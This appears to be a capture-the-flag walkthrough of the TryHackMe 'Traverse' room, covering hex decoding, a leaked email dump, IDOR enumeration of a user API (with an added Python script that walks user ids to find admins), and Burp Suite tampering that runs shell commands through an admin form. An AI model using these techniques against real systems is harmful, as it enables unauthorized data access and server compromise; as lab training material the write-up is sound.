This walkthrough will go over the Traverse room found on TryHackMe. This box aims to test your knowledge of secure software principles while introducing you to API endpoints and ways to manipulate parameters to obtain critical information. Additionally, you're presented with an opportunity to tailor HTTP requests in order to POST commands to further enumerate the backend server.
At first glance, this looks like hex. Let's confirm it and decode it using CyberChef (the From Hex recipe). Hex is an encoding rather than encryption, so no key is involved; anyone who can read the file can recover the content.
What is the flag value after deobfuscating the file?
Decrypting further with
Logging is an important aspect. What is the name of the file containing email dumps?
Going back to the source code on line 26 reveals a directory. Let's check it out.
Sure enough, there's our email_dump.txt file. Let's see what it contains.
The logs folder contains email logs and has a message for the software team lead. What is the name of the directory that Bob has created?
Hmmm... So the directory is named after the first phase of the SDLC,
What is the key file for opening the directory that Bob has created for Mark?
Going back to the content found in the email_dump.txt file reveals the key for opening the directory. Putting the key we obtained into the form brings us to our API content.
What is the email address for ID 5 using the leaked API endpoint?
Taking the API endpoint syntax and plugging it into our base URL displays raw data in JSON format. The endpoint hands back a record for whichever id we supply, with no check on who is asking for it: a textbook insecure direct object reference (IDOR), so changing the id is enough to walk the whole user table.
What is the ID for the user with admin privileges?
Playing around with the id numbers reveals our admin user.
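The id walk described above, scripted, as an added example that is not part of the original walkthrough or the room. The base URL, the /api/users/{id} path shape, the `email` field and the privilege field names are assumptions, and the FAKE_API dictionary is constructed so the script runs offline; against the live box you would pass http_get instead of fake_fetch.

```python
"""Enumerate sequential user ids on a leaked API endpoint and flag privileged
accounts (IDOR enumeration).  Added example; endpoint path, id parameter and
JSON field names are assumptions, not taken from the room."""
import json
from typing import Callable, Dict, Iterable, List, Optional
from urllib import error, request

BASE_URL = "http://traverse.thm"       # placeholder target (assumption)
ENDPOINT = "/api/users/{id}"           # assumed path shape: numeric id as path segment

# A fetcher maps a URL to the response body, or None when the server rejects the id.
Fetcher = Callable[[str], Optional[str]]


def http_get(url: str, timeout: float = 5.0) -> Optional[str]:
    """Real transport: plain urllib GET, treating any HTTP error as 'no such record'."""
    try:
        with request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except error.HTTPError:
        return None


def is_privileged(record: Dict) -> bool:
    """The admin account is identified by some privilege field in the JSON.  The exact
    field name is unknown, so several common names are checked (assumption)."""
    for key in ("role", "privilege", "privileges", "is_admin", "admin"):
        val = record.get(key)
        if isinstance(val, bool) and val:
            return True
        if isinstance(val, str) and "admin" in val.lower():
            return True
    return False


def enumerate_users(fetch: Fetcher, ids: Iterable[int], base: str = BASE_URL) -> List[Dict]:
    """Walk the id space.  Each JSON response is tagged with the id that produced it and
    whether it looks privileged; missing ids and non-JSON bodies are skipped."""
    found: List[Dict] = []
    for uid in ids:
        body = fetch(base + ENDPOINT.format(id=uid))
        if body is None:
            continue
        try:
            record = json.loads(body)
        except json.JSONDecodeError:
            continue
        record["_id"] = uid
        record["_privileged"] = is_privileged(record)
        found.append(record)
    return found


def admin_ids(records: List[Dict]) -> List[int]:
    """Ids of the records that carry a privilege marker."""
    return [r["_id"] for r in records if r["_privileged"]]


# Constructed sample API: sequential ids with gaps and a single admin.  Stands in for
# the live server so the example runs offline.
FAKE_API = {
    1: '{"id": 1, "email": "alice@example.com", "role": "user"}',
    2: '{"id": 2, "email": "bob@example.com", "role": "user"}',
    5: '{"id": 5, "email": "eve@example.com", "role": "user"}',
    7: '{"id": 7, "email": "root@example.com", "role": "admin"}',
}


def fake_fetch(url: str) -> Optional[str]:
    """Offline fetcher: look the trailing path segment up in FAKE_API."""
    uid = int(url.rsplit("/", 1)[1])
    return FAKE_API.get(uid)


if __name__ == "__main__":
    users = enumerate_users(fake_fetch, range(1, 11))
    for u in users:
        print(u["_id"], u.get("email"), "ADMIN" if u["_privileged"] else "")
    print("admin ids:", admin_ids(users))
    # Live box: enumerate_users(http_get, range(1, 11))
```

The fetcher is injected so the same enumeration logic runs against the constructed data or the real server; the privilege check is a heuristic over a few likely field names, so inspect the raw JSON once to confirm which field the API actually uses.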
What is the endpoint for logging in as the admin? Mention the last endpoint instead of the URL. For example, if the answer URL is tryhackme.com/admin, just write /admin.
The attacker uploaded a web shell and renamed a file used for managing the server. Can you find the name of the web shell that the attacker has uploaded?
First, we need to log in to track down this web shell. We can use the credentials obtained through the API endpoint.
Logging in brings us to this Admin Page.
Intercepting the POST request with Burp Suite allows us to manipulate the command beyond what the form intended: whatever we put in the command field is handed to the backend and executed. We can accomplish this in 4 simple steps:
Route traffic from our browser via FoxyProxy (my preferred way).
Right-click the intercepted request and send to
Change the command to ls to view the content of the current working directory and gain more information.
What is the name of the file renamed by the attacker for managing the web server?
This can be retrieved from the response to our tailored Burp Suite request.
Can you use the file manager to restore the original website by removing the "FINALLY HACKED" message? What is the flag value after restoring the main website?
We can do this by going to /realadmin/REDACTED_****_*****er.php and typing in our discovered password. Opening index.php and selecting the Advanced Editor gives us the ability to remove the "Finally Hacked" message as well as retrieve our final flag.